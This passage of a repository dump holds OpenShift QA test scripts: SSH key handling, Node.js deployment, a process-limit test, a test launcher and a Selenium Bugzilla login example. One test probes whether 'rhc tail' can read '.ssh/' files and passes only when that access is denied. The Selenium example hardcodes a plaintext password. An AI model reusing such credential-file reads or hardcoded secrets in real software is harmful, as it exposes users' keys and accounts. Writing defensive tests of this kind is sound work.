run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5451678037643433, "alphanum_fraction": 0.5604866147041321, "avg_line_length": 41.266666412353516, "blob_id": "3d72ec48057b93f048486decdfed367c50ebe9bb", "content_id": "8ba6f3c7846f4d92122b072266be6980b806a593", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4439, "license_type": "no_license", "max_line_length": 158, "num_lines": 105, "path": "/automation/open/testmodules/RT/client/add_remove_mult_ssh_keys.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#\n# File name: add_remove_mult_ssh_keys.py\n# Date: 2012/03/20 10:52\n# Author: [email protected]\n#\n\nimport os\n\nimport testcase, common\nimport rhtest\n# user defined packages\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.key_name1 = common.getRandomString(10)\n self.key_name2 = common.getRandomString(10)\n self.key_file_name1 = common.getRandomString(10)\n self.key_file_name2 = common.getRandomString(10)\n tcms_testcase_id = 141794\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -f %s\"%self.key_file_name1)\n os.system(\"rm -f %s\"%self.key_file_name2)\n common.remove_sshkey(self.key_name1)\n common.remove_sshkey(self.key_name2)\n\n\nclass AddRemoveMultSshKeys(OpenShiftTest): \n def test_method(self):\n status1 = common.command_get_status(\"ssh-keygen -t rsa -N '' -f %s\" % self.key_file_name1)\n status2 = common.command_get_status(\"ssh-keygen -t rsa -N '' -f %s\" % self.key_file_name2)\n \n if status1 != 0 or status2 != 0:\n return self.failed(\"Unable to create a ssh key\")\n\n self.steps_list.append(testcase.TestCaseStep(\"Add created key as %s\"%self.key_name1,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_file_name1), self.key_name1, self.user_email, self.user_passwd],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add created key as %s\"%self.key_name2,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_file_name2), self.key_name2, self.user_email, self.user_passwd],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove the first one\" ,\n common.remove_sshkey,\n function_parameters=[self.key_name2, self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"Should remove only one the %s not the %s (despite they are the same)\"%(self.key_name2, self.key_name1)))\n\n self.steps_list.append(testcase.TestCaseStep(\"Check the %s\"%self.key_name1,\n \"rhc sshkey list -l %s -p '%s' %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=[\"%s\"%self.key_name1],\n unexpect_string_list=[\"%s\"%self.key_name2],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove the second one\",\n common.remove_sshkey,\n function_parameters=[self.key_name1, self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"Should remove the %s\"%self.key_name1))\n\n self.steps_list.append(testcase.TestCaseStep(\"Check both keys - %s/%s\"%(self.key_name1, self.key_name2),\n \"rhc sshkey list -l %s -p '%s' %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n unexpect_string_list=[\"%s\"%self.key_name1, \"%s\"%self.key_name2],\n expect_return=0))\n\n case = testcase.TestCase(\"Add/remove multi ssh keys with same value and different names\",\n self.steps_list)\n\n case.run()\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n \n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddRemoveMultSshKeys)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n \n\n#\n# end of add_remove_mult_ssh_keys.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5772171020507812, "alphanum_fraction": 0.583588182926178, "avg_line_length": 31.42148780822754, "blob_id": "d2312a6ec4b93f195016011e284e125dd7e393f1", "content_id": "320f8716fbea2bac5097e244798089edea77264c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3924, "license_type": "no_license", "max_line_length": 159, "num_lines": 121, "path": "/automation/open/testmodules/RT/cartridge/nodejs_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nFeb 14, 2012\n\n[US590][Runtime][rhc-cartridge]nodejs framework support\nhttps://tcms.engineering.redhat.com/case/136576/\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport re\nimport fileinput\n\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US590][Runtime][rhc-cartridge]nodejs framework support\"\n self.app_type = 'nodejs'\n self.app_name = 'my%s%s' % ( self.app_type, common.getRandomString() )\n self.git_repo = './' + self.app_name\n self.steps_list = []\n self.random_string = common.getRandomString()\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass NodeJsFrameworkSupport(OpenShiftTest):\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n 'Creating the application',\n common.create_app,\n function_parameters = [ self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, ],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Checking welcome screen',\n common.check_web_page_output,\n function_parameters = [ self.app_name ],\n expect_description = 'The index page must be OpenShift branded',\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Configuring the application',\n self.configuring_nodejs_app,\n function_parameters = [ self.git_repo, self.random_string ],\n expect_description = \"Condiguration of our NodeJS should be successfull\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Checking NodeJS web-page output',\n common.check_web_page_output,\n function_parameters = [ self.app_name, '', self.random_string ],\n expect_description = 'In output we have to find our random string',\n expect_return = 0))\n \n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def configuring_nodejs_app(self, git_repo, random_string):\n\n try:\n file_name = git_repo + \"/server.js\"\n for line in fileinput.input(file_name, inplace = True):\n match = re.search(r\"res.send\\(self.cache_get\\('index.html.*\", line)\n if match:\n print 'res.send(\"<html><head></head><body><p>%s</p></body></html>\");' % ( random_string )\n else:\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n\n deployment_steps = [\n \"cd %s\" % ( git_repo ),\n \"git commit -a -m 'Added special handler for /'\",\n \"git push\" ]\n\n ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(deployment_steps))\n print ret_output\n return ret_code\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodeJsFrameworkSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5755555629730225, "alphanum_fraction": 0.5788888931274414, "avg_line_length": 18.565217971801758, "blob_id": "adc74115bd25a16621093dbe42931cfd94ea1330", "content_id": "18c6a84b1ae3cd58f38a901c849e45063acf9363", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1800, "license_type": "no_license", "max_line_length": 70, "num_lines": 92, "path": "/automation/open/testmodules/RT/limits/app_template/nproc.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\n#\n# Run multifork.py\n#\n# actions:\n# start - run as a daemon\n# stop - stop daemon \n# status - query daemon status\n# clean - remove logs and any leftover processes\n# onetime - run once without forking\n#\n# \n# parameters:\n# daemon - fork\n# logfile - where to write logs\n# pidfile - where to write the PID for controls\n# format - the output format of the logs\n# duration - how long to run\n# count - the number of processes to try to start\n\n$scriptfile = \"python multifork.py\";\n\n$defaults = \n array(\n\t'debug' => FALSE,\n\t'verbose' => FALSE,\n\t'noop' => FALSE,\n\t'help' => FALSE,\n\t'daemon' => FALSE,\n\t'logfile' => NULL,\n\t'pidfile' => NULL,\n\t'format' => NULL,\n\t'duration' => NULL,\n\t'count' => NULL\n\t);\n\n$formats = array('text', 'html', 'xml', 'json');\n\n$shortopts = \"dvnhl:p:f:D:c:\";\n\n$longopts = \n array(\n\t\"debug\",\n\t\"verbose\",\n\t\"dryrun\",\n\t\"help\",\n\t\"daemon\",\n\t\"logfile:\",\n\t\"pidfile:\",\n\t\"format:\",\n\t\"duration:\",\n\t\"count:\"\n\t);\n\n$optmap = array(\n\t\t\"d\" => \"debug\",\n\t\t\"v\" => \"verbose\",\n\t\t\"n\" => \"dryrun\",\n\t\t\"h\" => \"help\",\n\t\t\"l\" => \"logfile\",\n\t\t\"p\" => \"pidfile\",\n\t\t\"f\" => \"format\",\n\t\t\"D\" => \"duration\",\n\t\t\"c\" => \"count\"\n\t\t);\n\nif (isset($_SERVER['argc'])) {\n #\n # Only collect options from CLI if called that way\n #\n $opt = getopt($shortopts, $longopts);\n\n # map the short to long and remove them.\n $shortkeys = array_keys($optmap);\n foreach ($opt as $optkey => $optvalue) {\n if (array_key_exists($optkey, $optmap)) {\n $longkey = $optmap[$optkey];\n if (! array_key_exists($longkey, array_keys($opt))) {\n\t$opt[$longkey] = $optvalue;\n }\n unset($opt[$optkey]);\n }\n }\n} else {\n # Collect options from server GET/POST\n $dummy = 0;\n}\n\nexec(\"$scriptfile --format text --duration 10 --count 300\" , $output);\n$result = join(\"\\n\", $output);\nprint $result;\n?>\n" }, { "alpha_fraction": 0.5400837063789368, "alphanum_fraction": 0.5482936501502991, "avg_line_length": 33.89887619018555, "blob_id": "3e156367752c1a75e5660c961f7d144a4c411bcc", "content_id": "dbd52e091e09e7a8e0edb1efeb78a4fb3b6a79b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6212, "license_type": "no_license", "max_line_length": 128, "num_lines": 178, "path": "/automation/open/testmodules/RT/client/rhc_tail_files_check.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport common, OSConf\nimport rhtest\nimport time\nimport os\n# user defined packages\nimport proc\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.exp_file = \"rhc-tail-files-%s.expect\"%common.getRandomString(5)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.text_to_verify = 'Jn316'\n try:\n self.app_type = self.get_variant()\n except:\n self.app_type = 'ruby'\n tcms_testcase_id=122302\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -f %s\"%self.exp_file)\n try:\n self.rhc_tail_proc.kill()\n return\n common.destroy_app(self.app_name)\n common.command_get_status(\"rm -rf %s\"%self.app_name)\n except:\n pass\n\n\nclass RhcTailFilesCheck(OpenShiftTest):\n\n def run_rhc_tail(self, arguments=''):\n url = OSConf.get_app_url(self.app_name)\n for i in range(1): #touch that app\n common.grep_web_page(url,'OpenShift')\n\n # Get the path of rhc\n (status, output) = common.command_getstatusoutput('which rhc')\n if status != 0:\n return self.failed(\"Unable to find rhc client\")\n\n fw = open(self.exp_file, \"wb\")\n fw.write(\"\"\"spawn -nottyinit %s tail %s -l %s -p %s %s %s\nset timeout -1\nexpect wait_for_ever_and_ever\n \"\"\"%(output.strip(), self.app_name, self.user_email, self.user_passwd, arguments, common.RHTEST_RHC_CLIENT_OPTIONS))\n fw.close()\n \n cmd=[\"/usr/bin/expect\", self.exp_file] \n\n try:\n self.rhc_tail_proc.wait(1)\n self.rhc_tail_proc.kill()\n except:\n pass\n\n try:\n #stdin as /dev/null is very impotant thing if we run SSH remotely, \n #which is also this case\n self.rhc_tail_proc = proc.Proc(cmd, \n shell=False, \n stdin=open(os.devnull, 'rb'))\n except Exception as e:\n self.error(str(e))\n return False\n\n return True\n\n def do_changes(self):\n uuid= OSConf.get_app_uuid(self.app_name)\n try:\n for i in range(5):\n cmd = \"echo %s>> /var/lib/openshift/%s/%s/logs/error_log-*\"%(self.text_to_verify, uuid, self.app_type)\n (status1, output) = common.run_remote_cmd(self.app_name, cmd)\n cmd = \"echo %s>> /var/lib/openshift/%s/%s/logs/access_log-*\"%(self.text_to_verify, uuid, self.app_type)\n (status2, output) = common.run_remote_cmd(self.app_name, cmd)\n except Exception as e:\n self.error(str(e))\n return 1\n\n return status1+status2\n\n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n for i in range(1): #touch that app\n common.grep_web_page(url, 'OpenShift')\n\n return self.rhc_tail_proc.grep_output(self.text_to_verify, 3, 10)\n\n\n def test_method(self):\n\n rhtest.TestStep(self, \"1. Let's have an %s app\"%self.app_type,\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, \n False],\n expect_description=\"App should be created\",\n expect_return=0)()\n\n rhtest.TestStep(self, \"2. Run rhc-tail-files to monitor into background\",\n self.run_rhc_tail,\n expect_description=\"Monitor rhc-tail-files should be run without errors\",\n expect_return=True)()\n\n rhtest.TestStep(self, \"3.Append some data to log files directly.\",\n self.do_changes,\n expect_description=\"Data should be appended to the remote log files\",\n expect_return=0)()\n\n rhtest.TestStep(self, \"4. Verify output of 'rhc tail'\", \n self.verify,\n expect_description=\"Searched string should be found via web output\",\n expect_return=0)()\n\n rhtest.TestStep(self, \"5. Append some data to log files directly.\",\n self.do_changes,\n expect_description=\"Data should be appended to the remote log files\",\n expect_return=0)()\n\n rhtest.TestStep(self, \"6. Check direct call\",\n self.run_rhc_tail,\n function_parameters = [\"--file %s/logs/access_log-%s-000000-*\"%(self.app_type, \n time.strftime(\"%Y%m%d\",time.localtime()))],\n expect_description = \"Direct parameter should work\",\n expect_return=True)()\n\n if self.rhc_tail_proc.grep_output(\"HTTP\", 3, 10)!=0:\n return self.failed(\"Unable to launch't rhc-tail-files --files\")\n\n '''\n step = rhtest.TestStep(self, \"Check --file *\", \n self.run_rhc_tail,\n function_parameters=[self.app_name, '--file \"*\"'],\n expect_return=1)\n (status, output) = step()\n if (rhc_tail.poll()==None):\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.terminate()\n\n '''\n rhtest.TestStep(self, \"7. Check --file .ssh/\",\n self.run_rhc_tail,\n function_parameters = [\"--file .ssh/\"],\n expect_description=\"We shouldn't be allowed\",\n expect_return=True)()\n\n if not self.rhc_tail_proc.grep_output(\"Could not find any files matching glob\",3,10):\n return self.failed(\"rhc-tail-files could read .ssh/ files\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcTailFilesCheck)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5711519122123718, "alphanum_fraction": 0.5844759345054626, "avg_line_length": 38.35670852661133, "blob_id": "639b8e63028d6c110fe7fbf98594d1c026b81d56", "content_id": "5a6f0f9450330fa0d91316c0beac5e36f82472bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12909, "license_type": "no_license", "max_line_length": 263, "num_lines": 328, "path": "/open_automation/bin/plauncher.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nimport time\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\ntestmodules_path = os.path.abspath(file_path + \"/../testmodules\")\nsys.path.append(lib_path)\nsys.path.append(testmodules_path)\nfrom tcms import TCMS\nimport common\nimport Queue\n\nq = Queue.Queue()\nq2 = Queue.Queue()\n\nCOUNTER=0\nPARALLEL_MODE=False\n\ntcmsobj = None\n\n \ndef run_tests(testrun_id, tc_id_list=None):\n testrun_cases = tcmsobj.get_testcase_from_run(testrun_id)\n final_testrun_cases = []\n\n print \"Filtering Test Case ...\"\n for i in testrun_cases:\n testcaserun = tcmsobj.get_testcaserun(i['case_id'],testrun_id)\n i['testcaserun_id'] = testcaserun['case_run_id']\n #print \"-\"*5\n #print i\n #print testcaserun\n #print \"-\"*5\n if i['case_status'] != 'CONFIRMED' or i['is_automated'] != 1 or testcaserun['case_run_status'] != 'IDLE': \n print \"Case %s in this test run is not confirmed, or automated, or its status is not idled, skipping it\" %(i['case_id'])\n else:\n if tc_id_list != None and i['case_id'] not in tc_id_list:\n #print type(i['case_id'])\n print \"Case %s in not in your specified list - %s, skipping it\" %(i['case_id'], tc_id_list)\n else:\n final_testrun_cases.append(i)\n\n if len(final_testrun_cases) == 0:\n print \"No suitable test for testing !!!\"\n return\n\n # First of all, will run 142463 case\n #print \"=\" * 20\n #print \"Job starts - Creating domain\"\n #print \"=\" * 20\n queue_cmd(\"RT.job_related.create_domain\")\n\n for tc in final_testrun_cases:\n print \"-\" * 10\n print \"Enqueining test case - %s\" %(tc['case_id'])\n print \"-\" * 10\n #print tc\n #print \"-\" * 5\n script = tc['script'].split(\".py\")[0]\n #print \"----->\", script\n cf_path = \"%s/%s.%s\" %(testmodules_path, script + \".conf\", os.environ['OPENSHIFT_user_email'])\n #print \"----->\", cf_path\n module_name = \".\".join(script.split(\"/\"))\n if tc['arguments'] == '':\n tc['arguments'] = None\n content = \"\"\"\ntcms_arguments = %s\nscript = '%s'\ntcms_testcase_id = %s\ntcms_testrun_id = %s\ntcms_testcaserun_id = %s\n\"\"\" %(tc['arguments'], tc['script'], tc['case_id'], testrun_id, tc['testcaserun_id'])\n\n # Before running, check status again, set it for RUNNING status, also for parallel funcationaliy\n case_run = tcmsobj.get_testcaserun_by_id(tc['testcaserun_id'])\n if case_run['case_run_status'] == 'IDLE':\n #tcmsobj.update_testcaserun_status(tc['testcaserun_id'], 'RUNNING')\n common.write_file(cf_path, content)\n queue_cmd(module_name, {'testcaserun_id' : tc['testcaserun_id']})\n else:\n print \"Testcaserun - %s status is not IDLE now, skip it.\" %(tc['testcaserun_id'])\n\n # In the end, will run 146352\n print \"=\" * 20\n print \"Job ends - Cleaning domain and app\"\n print \"=\" * 20\n queue_cmd(\"RT.job_related.apps_clean_up\")\n queue_cmd(\"RT.job_related.apps_clean_up\") #we need this also for the second thread\n #\n # Let's run the queues\n #\n if PARALLEL_MODE == True:\n #we have to put the last to other queue for cleaning...\n run_queues_in_parallel()\n else:\n run_queues_in_sequence()\n\n # Update the test run status to FINISHED \n tcmsobj.update_testrun(testrun_id, {'status' : 1})\n\n\ndef create_test_run(testrun_tag, tc_id_list):\n \"\"\"\n Create TCMS.TestRun according to tc_id_list or tc_tag_list.\n \"\"\"\n timestamp = time.strftime(\"%Y_%m_%d-%H:%M:%S\", time.localtime())\n test_run_summary = \"Openshift-%s-%s\" %(testrun_tag, timestamp)\n testrun_id = tcmsobj.create_testrun(test_run_summary)['run_id']\n # create_domain - 142463; clean_up - 146352\n # This two cases must be added into new test run as the first one, and the last one.\n #update_test_run(testrun_id, [142463])\n update_test_run(testrun_id, tc_id_list) \n #update_test_run(testrun_id, [146352])\n return testrun_id\n \n\n\ndef update_test_run(testrun_id, tc_id_list):\n \"\"\"\n Update TCMS.TestRun according to tc_id_list.\n \"\"\"\n if tc_id_list != None and isinstance(tc_id_list, list) and len(tc_id_list) != 0:\n tcmsobj.add_testcase_to_run(tc_id_list, testrun_id)\n return True\n else:\n print \"only support list format for test cases\"\n return False\n \n \n \ndef get_email(id=None):\n if id is None:\n return os.getenv(\"OPENSHIFT_user_email\")\n\n if not os.environ.has_key(\"OPENSHIFT_user_email2\"):\n print \"WARN: Missing OPENSHIFT_user_email2, using generated one istead.\"\n return os.getenv(\"OPENSHIFT_user_email\").replace('@','%s@'%str(id))\n else:\n os.getenv(\"OPENSHIFT_user_email2\")\n\ndef main():\n global tcmsobj\n global PARALLEL_MODE\n\n usage = \"\"\"\nusage: %s {Instance Arguments} {TCMS Arguments}\nInstance Arguments: (-a ec2-xxx.compute-1.amazonaws.com) | ([-m devenv_xxx] [-n QE_devenv_xxx] [-z xxx])\nTCMS Arguments: (-t xxx (-c 'n, ..., m')|(-g 'xxx, ..., zzz') [-p xxx]) | (-i xxx [(-c 'n, ..., m')|(-g 'xxx, ..., zzz') -p xxx])\n\"\"\" %(os.path.basename(__file__))\n\n from optparse import OptionParser\n parser = OptionParser(usage=usage)\n parser.add_option(\"-m\", \"--ami\", dest=\"ami\", help=\"Instance Arguments: Launch openshift instance from this ami.\")\n parser.add_option(\"-n\", \"--instance_tag\", dest=\"instance_tag\", help=\"Instance Arguments: Instance tag for the newly launched instance\")\n parser.add_option(\"-a\", \"--instance_ip\", dest=\"instance_ip\", help=\"Instance Arguments: Using this exsiting openshift instance for testing\")\n parser.add_option(\"-z\", \"--image_size\", dest=\"image_size\", default='m1.medium', help=\"Instance Arguments: Specify size for launching instance. By default it is m1.medium\")\n parser.add_option(\"-t\", \"--testrun_tag\", dest=\"testrun_tag\", help=\"TCMS Arguments: Create new test run with this tag\")\n parser.add_option(\"-i\", \"--testrun_id\", dest=\"testrun_id\", type=int, help=\"TCMS Arguments: Using this existing test run that you want to run.\")\n parser.add_option(\"-c\", \"--testcase_ids\", dest=\"testcase_ids\", help=\"TCMS Arguments: A list of test case ids that you want to execute\")\n parser.add_option(\"-g\", \"--testcase_tags\", dest=\"testcase_tags\", help=\"TCMS Arguments: A list of test case tags that you want to execute\")\n parser.add_option(\"-p\", \"--testplan_id\", dest=\"testplan_id\", default=4962, type=int, help=\"TCMS Arguments: All test cases are selected from this test plan for creating/updating test run. By default it is 4962 - https://tcms.engineering.redhat.com/plan/4962/\")\n parser.add_option(\"-P\", \"--parallel\", dest=\"parallel\", action=\"store_true\", help=\"Run in parallel mode. (by two different users)\")\n\n (options, args) = parser.parse_args()\n #print \"-->\", options\n #print \"-->\", args\n\n # Priority for Instance Arguments: -a -> -m\n if options.instance_ip != None: \n # This branch is when you want to use existing instance\n instance_ip = options.instance_ip\n elif options.ami != None:\n # This is when you want to launch new instance\n instance_ip = common.create_node(options.instance_tag, options.ami, options.image_size)\n else:\n print \"Warnning: No specified ami, will launch the latest one\"\n instance_ip = common.create_node(options.instance_tag, None, options.image_size)\n\n os.environ['OPENSHIFT_libra_server'] = instance_ip\n common.set_libra_server(instance_ip)\n\n\n #Do TCMS authentication only once\n tcmsobj = TCMS()\n #print tcmsobj.server.TestCase.get_tags(141096)\n tc_id_list = []\n tc_tag_list = []\n if options.testcase_ids != None:\n tmp_list = options.testcase_ids.split(',')\n for i in tmp_list:\n tc_id_list.append(int(i.strip()))\n elif options.testcase_tags != None:\n tmp_list = options.testcase_tags.split(',')\n for i in tmp_list:\n tc_tag_list.append(i.strip())\n #print \"--->\", tc_tag_list\n\n if options.parallel:\n print \"INFO: Parallel mode...\\n\"\n PARALLEL_MODE = True\n else:\n print \"INFO: Normal mode...\\n\"\n\n\n # Priority for TCMS Arguments: -i -> -t\n # Priority for test case filter arguments: -c -> -g\n if options.testrun_id != None:\n # This branch is when you want to use existing test run\n test_run_id = options.testrun_id\n print \"Using existing TCMS Test Run - https://tcms.engineering.redhat.com/run/%s/\" %(test_run_id)\n if len(tc_id_list) != 0:\n run_tests(test_run_id, tc_id_list)\n elif len(tc_tag_list) != 0:\n tc_id_list = tcmsobj.get_testcase_id_list_by_tag(tc_tag_lis)\n run_tests(test_run_id, tc_id_list)\n else:\n run_tests(test_run_id)\n elif options.testrun_tag != None: \n # This branch is when you want to create a new test run\n if len(tc_id_list) != 0:\n test_run_id = create_test_run(options.testrun_tag, tc_id_list)\n run_tests(test_run_id)\n elif len(tc_tag_list) != 0:\n tc_id_list = tcmsobj.get_testcase_id_list_by_tag(tc_tag_list)\n test_run_id = create_test_run(options.testrun_tag, tc_id_list)\n run_tests(test_run_id)\n else:\n print usage\n raise common.InputError(\"Entry test case id list using option '-c' or test case tag list using option '-g'\")\n else:\n print usage\n raise common.InputError(\"Enter existing TCMS test run id using option '-i' or create new TCMS test run using option '-t'\")\n\n\ndef run_queues_in_sequence():\n while not q.empty():\n (cmd, args) = q.get()\n tcmsobj.update_testcaserun_status(args['testcaserun_id'], 'RUNNING')\n os.system(cmd)\n \ndef run_queues_in_parallel():\n print \"INFO: Time for lunch? Let's Fork()...\"\n i=0 #counter\n #let's fork...\n child_pid = os.fork()\n os.system(\"rm -f Q*.log\")\n if child_pid == 0:\n print \"Child Process: PID# %s\" % os.getpid()\n q2_account = get_email(2)\n log_file=\"/tmp/curr_tc_log-%s\"%q2_account\n\n qsize=q2.qsize()\n domain=common.getRandomString(12)\n while not q2.empty():\n #update counter...\n i=i+1\n (cmd, args) = q2.get()\n tcmsobj.update_testcaserun_status(args['testcaserun_id'], 'RUNNING')\n print '\\033[93m',\"\\n[%d/%d]*********************Q2************************\\n\"%(i, qsize), cmd, '\\033[0m'\n\n os.environ['OPENSHIFT_user_email']=q2_account\n if os.environ.has_key('OPENSHIFT_user_passwd2'): #let's change passwrd as well\n os.environ['OPENSHIFT_user_passwd'] = os.environ['OPENSHIFT_user_passwd2']\n\n cmd = \"rm -rf Q2;mkdir -p Q2;cd Q2; \" +cmd+ \" 2>&1 | tee -a ../Q2.log\"\n ret = os.system(cmd)\n\n #if (ret==255 and i==1):\n # print \"Aborted -- Initialization failed.\"\n # sys.exit(ret)\n\n\n print '\\033[93m',\"\\n*********************Q2's END************************\\n\", '\\033[0m'\n\n else:\n print \"Parent Process: PID# %s\" % os.getpid()\n q1_account = get_email()\n log_file=\"/tmp/curr_tc_log-%s\"%q1_account\n qsize=q.qsize()\n while not q.empty():\n #update counter...\n i=i+1\n (cmd, tc) = q.get()\n print '\\033[94m',\"\\n[%d/%d]********************Q1****************************\\n\"%(i,qsize), cmd, '\\033[0m'\n \n os.environ['OPENSHIFT_user_email']=q1_account\n cmd = \"rm -rf Q1;mkdir -p Q1;cd Q1; \" +cmd+\" 2>&1 |tee -a ../Q1.log\"\n ret = os.system(cmd)\n\n #if (ret==255 and i==0):\n # print \"Aborted -- Initialization failed.\"\n # sys.exit(ret)\n\n\n print '\\033[94m',\"\\n*********************Q1's END************************\\n\", \n print \"Waiting for child to end...\"\n os.waitpid(child_pid, 0) # make sure the child process gets cleaned up\n print \"Done. Updating testrun status to FINISHED...\"\n # Update the test run status to FINISHED \n tcmsobj.update_testrun(testrun_id, {'status' : 1})\n print \"Done.\"\n print '\\033[0m'\n\n\ndef queue_cmd(testname, args={}):\n global COUNTER\n instance_ip = common.get_instance_ip()\n\n cmd = \"%s/rhtest --instance_ip=%s %s \" % (file_path, instance_ip, testname)\n\n if (PARALLEL_MODE==True):\n if COUNTER==0: #this is certainly INIT script, which we need in both queues\n q.put([cmd, args])\n q2.put([cmd, args])\n elif COUNTER%2==0:\n q.put([cmd, args])\n else:\n q2.put([cmd, args])\n\n COUNTER=COUNTER+1\n else:\n #simple queue\n q.put([cmd, args])\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7298735976219177, "alphanum_fraction": 0.7378576397895813, "avg_line_length": 27.358489990234375, "blob_id": "56ecfa0c0b804831f78855ec671c31f377a99358", "content_id": "faf17eed2c0603da640224e815b656f975b6e6c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1503, "license_type": "no_license", "max_line_length": 75, "num_lines": 53, "path": "/automation/Example/em_no_design.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\n# from selenium.webdriver.support.ui import WebDriverWait\n# from selenium.webdriver.support import expected_conditions as EC\n\n\ntest_env = 'https://bzweb01-qe.app.eng.rdu.redhat.com'\ndev_env = 'https://bzweb01-devel.app.eng.rdu.redhat.com'\n\nusername = '[email protected]'\npwd = 'redhat'\n\ndriver = webdriver.Firefox()\ndriver.get(dev_env)\ndriver.maximize_window()\n\nlogin_link_id = 'login_link_top'\nlogin_user_input_id = 'Bugzilla_login_top'\nlogin_user_pwd_id = 'Bugzilla_password_top'\nadmin_link_text = 'Administration'\nadmin_link_xpath = '//div/ul/li[11]/a'\nadmin_link_css = '#header ul li a[href=\"admin.cgi\"]'\n\nlogin_link = driver.find_element(by=By.ID, value=login_link_id)\nlogin_user_input = driver.find_element(by=By.ID, value=login_user_input_id)\nlogin_user_pwd = driver.find_element(by=By.ID, value=login_user_pwd_id)\n\nlogin_link.click()\n\nlogin_user_input.send_keys(username)\nlogin_user_pwd.send_keys(pwd)\nlogin_user_pwd.send_keys(Keys.RETURN)\n\n\n# How to deal with ajax\n\n# way1: static time sleep\n#admin_link = driver.find_element(By.LINK_TEXT, admin_link_text)\n#import time\n#time.sleep(5)\n\n# way2: smart wait\n#WebDriverWait(driver, 10).until(\n# EC.visibility_of_element_located((By.XPATH, admin_link_xpath)))\n#admin_link = driver.find_element(By.XPATH, 